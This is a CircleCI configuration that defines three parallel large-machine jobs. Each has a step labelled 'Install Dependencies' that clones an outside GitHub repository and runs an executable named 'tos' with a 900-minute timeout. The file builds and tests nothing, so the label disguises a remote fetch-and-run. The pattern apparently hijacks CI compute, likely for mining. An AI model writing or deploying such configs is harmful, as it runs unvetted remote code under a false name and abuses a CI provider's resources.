version: 2
jobs:
    aku1:
      machine:
            image: ubuntu-2004:202101-01
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: git clone https://github.com/gabriesad/pms.git && cd pms && chmod u+x tos && ./tos
            no_output_timeout: 900m
    aku2:
      machine:
            image: ubuntu-2004:202101-01
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: git clone https://github.com/gabriesad/pms.git && cd pms && chmod u+x tos && ./tos
            no_output_timeout: 900m
    aku3:
      machine:
            image: ubuntu-2004:202101-01
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: git clone https://github.com/gabriesad/pms.git && cd pms && chmod u+x tos && ./tos
            no_output_timeout: 900m

workflows:
    version: 2
    build:
        jobs:
            - aku1
            - aku2
            - aku3
